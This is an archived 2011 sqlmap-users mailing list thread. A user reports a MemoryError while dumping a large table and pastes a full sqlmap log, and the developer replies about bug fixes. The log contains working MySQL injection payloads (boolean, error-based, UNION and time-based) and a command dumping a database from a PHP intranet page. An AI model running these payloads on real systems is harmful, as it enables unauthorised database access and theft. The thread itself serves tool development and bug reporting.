LOL (50,350 entries in the table and 48 columns) we'll try to make some tests regarding this and report accordingly. haven't planed this kind of "huge" data retrievals :) kr On Thu, Jan 27, 2011 at 8:40 PM, David Guimaraes <sk...@gm...> wrote: > # ./sqlmap.py --method post --cookie "PHPSESSID=7i2j7ou46iu4c62xxx4kemiql6" > --data "vulnparam=6" -u "http://www.vulnsite.com/intranet/vulnphp.php" -v 3 > -D nomes -T class --dump > > sqlmap/0.9-dev - automatic SQL injection and database takeover tool > http://sqlmap.sourceforge.net > > [*] starting at: 16:58:05 > > [16:58:05] [DEBUG] cleaning up configuration parameters > [16:58:05] [DEBUG] setting the HTTP timeout > [16:58:05] [DEBUG] setting the HTTP Cookie header > [16:58:05] [DEBUG] setting the HTTP method to POST > [16:58:05] [DEBUG] creating HTTP requests opener object > [16:58:05] [INFO] using > '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session' as session file > [16:58:05] [INFO] resuming injection data from session file > [16:58:05] [INFO] resuming back-end DBMS 'mysql 5.0' from session file > [16:58:05] [INFO] testing connection to the target url > you provided an HTTP Cookie header value. The target url provided its own > Cookie within the HTTP Set-Cookie header. Do you want to continue using the > HTTP Cookie values that you provided? [Y/n] > sqlmap identified the following injection points with a total of 0 HTTP(s) > requests: > --- > Place: POST > Parameter: vulnparam > Type: boolean-based blind > Title: AND boolean-based blind - WHERE or HAVING clause > Payload: vulnparam=6 AND 5647=5647 > > Type: error-based > Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause > Payload: vulnparam=6 AND (SELECT 714 FROM(SELECT > COUNT(*),CONCAT(CHAR(58,111,106,112,58),(SELECT (CASE WHEN (714=714) THEN 1 > ELSE 0 END)),CHAR(58,99,99,109,58),FLOOR(RAND(0)*2))x FROM > information_schema.tables GROUP BY x)a) > > Type: UNION query > Title: MySQL UNION query (NULL) - 4 to 7 columns > Payload: vulnparam=6 UNION ALL SELECT NULL, NULL, > CONCAT(CHAR(58,111,106,112,58),IFNULL(CAST(CHAR(101,76,89,111) AS CHAR), > CHAR(32)),CHAR(58,99,99,109,58)), NULL, NULL# > > Type: AND/OR time-based blind > Title: MySQL > 5.0.11 AND time-based blind > Payload: vulnparam=6 AND SLEEP(5) > --- > > [16:58:06] [INFO] the back-end DBMS is MySQL > > web application technology: PHP 5.3.2 > back-end DBMS: MySQL 5.0 > [16:58:06] [INFO] fetching columns for table 'class' on database 'nomes' > [16:58:06] [INFO] read from file > '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session': vulncolumns > [16:58:06] [INFO] fetching entries for table 'class' on database 'nomes' > [16:58:06] [PAYLOAD] 6 UNION ALL SELECT NULL, NULL, > CONCAT(CHAR(58,101,110,122,58),XXX,CHAR(58,111,115,122,58)), NULL, NULL FROM > nomes.class# > [17:00:09] [DEBUG] performed 1 queries in 122 seconds > > [17:00:13] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run > with the latest development version from the Subversion repository. If the > exception persists, please send by e-mail to > sql...@li... the command line, the following text and > any information needed to reproduce the bug. The developers will try to > reproduce the bug, fix it accordingly and get back to you. > sqlmap version: 0.9-dev > Python version: 2.6.5 > Operating system: posix > Traceback (most recent call last): > File "./sqlmap.py", line 83, in main > start() > File "/home/kkk/sqlmap-dev/lib/controller/controller.py", line 414, in > start > action() > File "/home/kkk/sqlmap-dev/lib/controller/action.py", line 103, in action > conf.dumper.dbTableValues(conf.dbmsHandler.dumpTable()) > File "/home/kkk/sqlmap-dev/plugins/generic/enumeration.py", line 1189, in > dumpTable > entries = inject.getValue(query, blind=False, dump=True) > File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 427, in getValue > value = __goInband(query, expected, sort, resumeValue, unpack, dump) > File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 384, in __goInband > data = parseUnionPage(output, expression, partial, None, sort) > File "/home/kkk/sqlmap-dev/lib/core/common.py", line 785, in > parseUnionPage > dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, > kb.injection.place, conf.parameters[kb.injection.place], expression, > logOutput)) > MemoryError > > [*] shutting down at: 17:00:13 > > There are about 50,350 entries in the table and 48 columns.I tested the > query manually, and returned a page with 600k of information.I think that > sqlmap did not support the amount of data...? > > David > > ------------------------------------------------------------------------------ > Special Offer-- Download ArcSight Logger for FREE (a $49 USD value)! > Finally, a world-class log management solution at an even better price-free! > Download using promo code Free_Logger_4_Dev2Dev. Offer expires > February 28th, so secure your free ArcSight Logger TODAY! > http://p.sf.net/sfu/arcsight-sfd2d > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: David G. <sk...@gm...> - 2011-01-27 19:40:54
|
# ./sqlmap.py --method post --cookie "PHPSESSID=7i2j7ou46iu4c62xxx4kemiql6" --data "vulnparam=6" -u "http://www.vulnsite.com/intranet/vulnphp.php" -v 3 -D nomes -T class --dump sqlmap/0.9-dev - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 16:58:05 [16:58:05] [DEBUG] cleaning up configuration parameters [16:58:05] [DEBUG] setting the HTTP timeout [16:58:05] [DEBUG] setting the HTTP Cookie header [16:58:05] [DEBUG] setting the HTTP method to POST [16:58:05] [DEBUG] creating HTTP requests opener object [16:58:05] [INFO] using '/home/kkk/sqlmap-dev/output/ www.vulnsite.com/session' as session file [16:58:05] [INFO] resuming injection data from session file [16:58:05] [INFO] resuming back-end DBMS 'mysql 5.0' from session file [16:58:05] [INFO] testing connection to the target url you provided an HTTP Cookie header value. The target url provided its own Cookie within the HTTP Set-Cookie header. Do you want to continue using the HTTP Cookie values that you provided? [Y/n] sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: POST Parameter: vulnparam Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: vulnparam=6 AND 5647=5647 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: vulnparam=6 AND (SELECT 714 FROM(SELECT COUNT(*),CONCAT(CHAR(58,111,106,112,58),(SELECT (CASE WHEN (714=714) THEN 1 ELSE 0 END)),CHAR(58,99,99,109,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 4 to 7 columns Payload: vulnparam=6 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,111,106,112,58),IFNULL(CAST(CHAR(101,76,89,111) AS CHAR), CHAR(32)),CHAR(58,99,99,109,58)), NULL, NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: vulnparam=6 AND SLEEP(5) --- [16:58:06] [INFO] the back-end DBMS is MySQL web application technology: PHP 5.3.2 back-end DBMS: MySQL 5.0 [16:58:06] [INFO] fetching columns for table 'class' on database 'nomes' [16:58:06] [INFO] read from file '/home/kkk/sqlmap-dev/output/ www.vulnsite.com/session': vulncolumns [16:58:06] [INFO] fetching entries for table 'class' on database 'nomes' [16:58:06] [PAYLOAD] 6 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,101,110,122,58),XXX,CHAR(58,111,115,122,58)), NULL, NULL FROM nomes.class# [17:00:09] [DEBUG] performed 1 queries in 122 seconds [17:00:13] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the command line, the following text and any information needed to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you. sqlmap version: 0.9-dev Python version: 2.6.5 Operating system: posix Traceback (most recent call last): File "./sqlmap.py", line 83, in main start() File "/home/kkk/sqlmap-dev/lib/controller/controller.py", line 414, in start action() File "/home/kkk/sqlmap-dev/lib/controller/action.py", line 103, in action conf.dumper.dbTableValues(conf.dbmsHandler.dumpTable()) File "/home/kkk/sqlmap-dev/plugins/generic/enumeration.py", line 1189, in dumpTable entries = inject.getValue(query, blind=False, dump=True) File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 427, in getValue value = __goInband(query, expected, sort, resumeValue, unpack, dump) File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 384, in __goInband data = parseUnionPage(output, expression, partial, None, sort) File "/home/kkk/sqlmap-dev/lib/core/common.py", line 785, in parseUnionPage dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, kb.injection.place, conf.parameters[kb.injection.place], expression, logOutput)) MemoryError [*] shutting down at: 17:00:13 There are about 50,350 entries in the table and 48 columns.I tested the query manually, and returned a page with 600k of information.I think thatsqlmap did not support the amount of data...? David |
|
From: Miroslav S. <mir...@gm...> - 2011-01-27 18:48:50
|
Hi again. This should be fixed with the last commit removing false positive cases. KR p.s. expect a huge speed up for UNION based detection in following days/week On Tue, Jan 25, 2011 at 5:07 PM, Miroslav Stampar <mir...@gm...> wrote: > Hi all. > > Just to drop a quick warning message. Currently there is a major > problem going on code named "Generic UNION/SQLite". All of you who > think that you've stumbled upon a Generic UNION/SQLite injection > you've probably had a "visit" by a FALSE positive. > > We'll try to fix this ASAP together with other UNION based detection issues. > > KR > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Miroslav S. <mir...@gm...> - 2011-01-27 18:42:04
|
Hi all. Apologies, and big thanks to Ahmed Shawky <ah...@is...> for pointing to this problem. If you had FALSE negatives for url parameters having original values with url encoded data, you've probably have encountered this bug. Basically, we were improperly urlencoding payloads together with original parameter values potentially leading to DOUBLE url encoding of original parameter values (especially the case for multi-word string values). Example: Original: name=John%20Smith Improper injection payload (notice the double url encoding %25%20): name=John%25%20Smith%20AND%201%3D1 Now it should be fixed, but feel free to report "strange" behavior. Only strange thing is that nobody has noticed this till now :) KR |
48 messages has been excluded from this view by a project administrator.
